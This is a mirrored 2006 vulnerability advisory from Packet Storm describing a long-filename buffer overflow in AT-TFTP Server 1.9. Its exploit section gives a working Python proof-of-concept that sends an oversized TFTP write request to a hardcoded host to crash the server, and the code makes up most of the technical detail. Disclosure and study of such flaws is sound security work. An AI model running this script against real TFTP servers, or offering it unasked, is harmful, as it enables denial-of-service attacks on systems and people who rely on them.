Lucene search
K

at-tftp19.txt

🗓️ 29 Nov 2006 00:00:00Reported by Qixu LiuType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

AT-TFTP Server v 1.9 Buffer Overflow Vulnerability (Long filename). Freeware TFTP server for Windows 9x/NT/XP with TFTPv2 protocol implementation. Allows remote or local attackers to execute arbitrary commands or cause denial of service due to buffer overflow when handling overly long file names

Code
`TFTP Server AT-TFTP Server v 1.9 Buffer Overflow Vulnerability (Long filename)  
  
------------------------------------------------------------------  
SUMMARY:  
  
AT-TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.  
(http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp)   
It provides an implementation of the TFTPv2 protocol.  
  
A vulnerability has been identified in TFTP Server AT-TFTP Server v1.9, which could be exploited by remote or local attackers to execute arbitrary commands or cause a denial of service. This flaw is due to a buffer overflow error when handling an overly long file name (more than 227 bytes) passed to a "GET" or "PUT" command, which could be exploited by malicious users to compromise a vulnerable system or crash an affected application.  
----------  
DETAILS:  
  
Vulnerable systems: AT-TFTP Server v 1.9 and probable prior  
  
Exploit:  
  
#!/usr/bin/python  
# Buffer Overflow (Long filename) Vulnerability Exploit  
# This is just a DoS exploiting code  
# Tested on Windows xp SP2  
#  
# Requires python and impacket  
#  
# Coded by Liu Qixu Of NCNIPC  
  
import socket  
import sys  
  
host = '192.168.1.11'  
port = 69  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
except:   
print "socket() failed"   
sys.exit(1)  
  
filename = "A" * 227   
mode = "netascii"  
data = "\x00\x02" + filename + "\0" + mode + "\0"  
s.sendto(data, (host, port))  
  
------------------------------------------  
Liu Qixu  
NCNIPC  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation